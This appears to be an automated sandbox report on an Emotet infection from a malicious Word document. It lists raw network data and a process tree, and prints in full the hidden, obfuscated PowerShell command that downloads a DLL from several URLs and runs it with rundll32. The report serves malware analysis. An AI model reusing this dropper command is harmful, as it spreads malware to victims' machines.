Jan 27, 2021 00:10:17.047100067 CET	12	IN	Data Raw: 00 64 8f 05 00 00 00 00 83 c4 0c c3 e8 7f 03 00 00 84 d2 7e 05 e8 5e 03 00 00 c3 90 85 c0 74 07 b2 01 8b 08 ff 51 fc c3 53 56 57 89 c3 89 d7 ab 8b 4b d8 31 c0 51 c1 e9 02 49 f3 ab 59 83 e1 03 f3 aa 89 d0 89 e2 8b 4b b8 85 c9 74 01 51 8b 5b dc 85 Data Ascii: d~^tQSVWK1QIYKtQ[t9t[st{4Iu9u_^[SV6Vvtu^[sr!(@USVW3]U3Uh4@d0d
Jan 27, 2021 00:10:17.047190905 CET	14	IN	Data Raw: 80 3d 28 40 46 00 00 77 15 50 8d 44 24 08 52 51 50 e8 40 da ff ff 83 f8 00 59 5a 58 74 70 83 48 04 02 53 31 db 56 57 55 64 8b 1b 53 50 52 51 8b 54 24 28 6a 00 50 68 b8 38 40 00 52 ff 15 18 60 46 00 8b 7c 24 28 e8 0f 2b 00 00 ff b0 00 00 00 00 89 Data Ascii: =(@FwPD$RQP@YZXtpHS1VWUdSPRQT$(jPh8@R`F\|$(+o_G8@f*ATD$@o8ta`FSuH@T$SVWUJYqtC?
Jan 27, 2021 00:10:17.208486080 CET	15	IN	Data Raw: e6 ff ff 89 d8 e8 e8 fe ff ff 89 3b 5f 5e 5b c3 8b c0 55 8b ec 6a 00 6a 00 52 50 8b 45 08 50 51 6a 00 a1 c0 65 46 00 50 e8 6d d0 ff ff 5d c2 04 00 90 55 8b ec 52 50 8b 45 08 50 51 6a 00 a1 c0 65 46 00 50 e8 31 d0 ff ff 5d c2 04 00 90 53 56 57 55 Data Ascii: ;_^[UjjRPEPQjeFPm]URPEPQjeFP1]SVWUP$_n}(VD$L$\|T$A,VL$T}3o]_^[RZ1t!R:

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2364 Parent PID: 584

General

Start time:	00:09:34
Start date:	27/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13fb80000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2400 Parent PID: 1220

General

Start time:	00:09:35
Start date:	27/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJwArACcAZAA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwBlAG8AJwApACsAKAAnAHAAYQByACcAKwAnAGQAYwAnACkAKwAoACcAcgBhAG4AJwArACcAZQBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AJwArACcAegB5AG4AcQAnACkAKwAnAC0AJwArACcAbAAnACsAKAAnAGkAJwArACcAbgB1ACcAKwAnAHgAJwArACcALQB5AGEAYQB5ACcAKQArACcAZgAvACcAKwAoACcAdwAnACsAJwAvACEAbgAnACkAKwAnAHMAIAAnACsAKAAnAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgACcAKQArACcAbgAnACsAJwBkACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AbQBtAHIAaQBuAGMAJwArACcAcwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGUAdABlAHIAbgBhAGwALQAnACkAKwAoACcAZAAnACsAJwB1AGUAbAAnACkAKwAoACcAaQAnACsAJwBzAHQALQAnACkAKwAoACcAOQBjAHUAJwArACcAcQB2AC8AagAnACkAKwAoACcAeAAnACsAJwBHAFEAagAvACEAJwArACcAbgAnACkAKwAoACcAcwAnACsAJwAgAHcAJwApACsAKAAnAHUAIABkACcAKwAnAGIAIABuAGQAJwArACcAOgAvACcAKQArACgAJwAvADMAJwArACcAbQB1ACcAKwAnAHMAawAnACkAKwAnAGUAdAAnACsAKAAnAGUAZQByACcAKwAnAHMAZQBuAHQALgBuAGUAJwArACcAdAAvACcAKQArACgAJwB3ACcAKwAnAHAALQBpAG4AJwArACcAYwBsAHUAZABlAHMALwBUAFUAJwArACcAZwBEAC8AIQBuACcAKwAnAHMAIAAnACkAKwAnAHcAdQAnACsAJwAgACcAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AZAAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAcwAnACsAJwBrAGkAbABtAHUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB3ACcAKwAnAHAALQBhACcAKQArACcAZAAnACsAKAAnAG0AaQBuAC8AJwArACcAaAAnACsAJwBRACcAKQArACgAJwBWAGwAQgAnACsAJwA4AGIALwAnACkAKQAuACIAcgBgAGUAUABsAEEAYABjAEUAIgAoACgAKAAnAG4AcwAnACsAJwAgACcAKQArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAnAG4AZAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEsAMQBpAHUAeAB4AHAALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBwAGAAbABpAFQAIgAoACQARAA1ADQAUwAgACsAIAAkAEsAbwAzAGEAYwA2ADMAIAArACAAJABGADAAOABKACkAOwAkAE8AMQA2AFIAPQAoACcAWAA2ACcAKwAnADIAVgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEoAZAA1AHMAXwBoAGYAIABpAG4AIAAkAFQAYQAxAHkAcwBwADQAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAHMAeQBTAFQARQBNAC4ATgBlAFQALgB3AEUAQgBDAEwASQBFAG4AdAApAC4AIgBEAE8AdwBOAGAATABgAG8AQQBgAEQARgBJAGwARQAiACgAJABKAGQANQBzAF8AaABmACwAIAAkAFEAZgB4ADEAMAB4AGEAKQA7ACQATAAyADkARAA9ACgAJwBPADYAJwArACcANABIACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGYAeAAxADAAeABhACkALgAiAEwAYABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAA0ADQANwAxADIAKQAgAHsAJgAoACcAcgB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAUQBmAHgAMQAwAHgAYQAsACgAJwBBACcAKwAoACcAbgB5AFMAdAAnACsAJwByACcAKQArACgAJwBpACcAKwAnAG4AZwAnACkAKQAuACIAVABvAHMAYABUAFIAaQBgAE4AZwAiACgAKQA7ACQAQgAyADcAQgA9ACgAKAAnAFcANAAnACsAJwAzACcAKQArACcAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFoAOAAxAFYAPQAoACcASQA2ACcAKwAnADIAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIANQA4AEkAPQAoACcATwAzACcAKwAnADUASQAnACkA
Imagebase:	0x4a5a0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: msg.exe PID: 2624 Parent PID: 2400

General

Start time:	00:09:36
Start date:	27/01/2021
Path:	C:\Windows\System32\msg.exe
Wow64 process (32bit):	false
Commandline:	msg user /v Word experienced an error trying to open the file.
Imagebase:	0xff860000
File size:	26112 bytes
MD5 hash:	2214979661E779C3E3C33D4F14E6F3AC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 2544 Parent PID: 2400

General

Start time:	00:09:36
Start date:	27/01/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJwArACcAZAA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwBlAG8AJwApACsAKAAnAHAAYQByACcAKwAnAGQAYwAnACkAKwAoACcAcgBhAG4AJwArACcAZQBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AJwArACcAegB5AG4AcQAnACkAKwAnAC0AJwArACcAbAAnACsAKAAnAGkAJwArACcAbgB1ACcAKwAnAHgAJwArACcALQB5AGEAYQB5ACcAKQArACcAZgAvACcAKwAoACcAdwAnACsAJwAvACEAbgAnACkAKwAnAHMAIAAnACsAKAAnAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgACcAKQArACcAbgAnACsAJwBkACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AbQBtAHIAaQBuAGMAJwArACcAcwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGUAdABlAHIAbgBhAGwALQAnACkAKwAoACcAZAAnACsAJwB1AGUAbAAnACkAKwAoACcAaQAnACsAJwBzAHQALQAnACkAKwAoACcAOQBjAHUAJwArACcAcQB2AC8AagAnACkAKwAoACcAeAAnACsAJwBHAFEAagAvACEAJwArACcAbgAnACkAKwAoACcAcwAnACsAJwAgAHcAJwApACsAKAAnAHUAIABkACcAKwAnAGIAIABuAGQAJwArACcAOgAvACcAKQArACgAJwAvADMAJwArACcAbQB1ACcAKwAnAHMAawAnACkAKwAnAGUAdAAnACsAKAAnAGUAZQByACcAKwAnAHMAZQBuAHQALgBuAGUAJwArACcAdAAvACcAKQArACgAJwB3ACcAKwAnAHAALQBpAG4AJwArACcAYwBsAHUAZABlAHMALwBUAFUAJwArACcAZwBEAC8AIQBuACcAKwAnAHMAIAAnACkAKwAnAHcAdQAnACsAJwAgACcAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AZAAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAcwAnACsAJwBrAGkAbABtAHUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB3ACcAKwAnAHAALQBhACcAKQArACcAZAAnACsAKAAnAG0AaQBuAC8AJwArACcAaAAnACsAJwBRACcAKQArACgAJwBWAGwAQgAnACsAJwA4AGIALwAnACkAKQAuACIAcgBgAGUAUABsAEEAYABjAEUAIgAoACgAKAAnAG4AcwAnACsAJwAgACcAKQArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAnAG4AZAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEsAMQBpAHUAeAB4AHAALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBwAGAAbABpAFQAIgAoACQARAA1ADQAUwAgACsAIAAkAEsAbwAzAGEAYwA2ADMAIAArACAAJABGADAAOABKACkAOwAkAE8AMQA2AFIAPQAoACcAWAA2ACcAKwAnADIAVgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEoAZAA1AHMAXwBoAGYAIABpAG4AIAAkAFQAYQAxAHkAcwBwADQAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAHMAeQBTAFQARQBNAC4ATgBlAFQALgB3AEUAQgBDAEwASQBFAG4AdAApAC4AIgBEAE8AdwBOAGAATABgAG8AQQBgAEQARgBJAGwARQAiACgAJABKAGQANQBzAF8AaABmACwAIAAkAFEAZgB4ADEAMAB4AGEAKQA7ACQATAAyADkARAA9ACgAJwBPADYAJwArACcANABIACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGYAeAAxADAAeABhACkALgAiAEwAYABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAA0ADQANwAxADIAKQAgAHsAJgAoACcAcgB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAUQBmAHgAMQAwAHgAYQAsACgAJwBBACcAKwAoACcAbgB5AFMAdAAnACsAJwByACcAKQArACgAJwBpACcAKwAnAG4AZwAnACkAKQAuACIAVABvAHMAYABUAFIAaQBgAE4AZwAiACgAKQA7ACQAQgAyADcAQgA9ACgAKAAnAFcANAAnACsAJwAzACcAKQArACcAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFoAOAAxAFYAPQAoACcASQA2ACcAKwAnADIAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIANQA4AEkAPQAoACcATwAzACcAKwAnADUASQAnACkA
Imagebase:	0x13ff00000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2812 Parent PID: 2544

General

Start time:	00:09:41
Start date:	27/01/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Imagebase:	0xff900000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2792 Parent PID: 2812

General

Start time:	00:09:42
Start date:	27/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Imagebase:	0x400000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2092243778.0000000000340000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2796 Parent PID: 2792

General

Start time:	00:09:42
Start date:	27/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
Imagebase:	0x400000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2094445834.0000000000710000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2093577825.0000000000410000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2094474454.0000000000740000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2920 Parent PID: 2796

General

Start time:	00:09:43
Start date:	27/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',WoLqYWepjKvdu
Imagebase:	0x400000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2095209420.00000000001F0000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2095115818.0000000000180000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2095854537.00000000003E0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2936 Parent PID: 2920

General

Start time:	00:09:44
Start date:	27/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',#1
Imagebase:	0x400000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2097508616.0000000000300000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2098058880.00000000003A0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2098090844.00000000003E0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 3044 Parent PID: 2936

General

Start time:	00:09:45
Start date:	27/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',yTCLpaeQtdZh
Imagebase:	0x400000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2099763419.00000000003D0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2099872528.00000000005A0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2098968815.0000000000140000.00000040.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2468 Parent PID: 3044

General

Start time:	00:09:46
Start date:	27/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',#1
Imagebase:	0x400000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
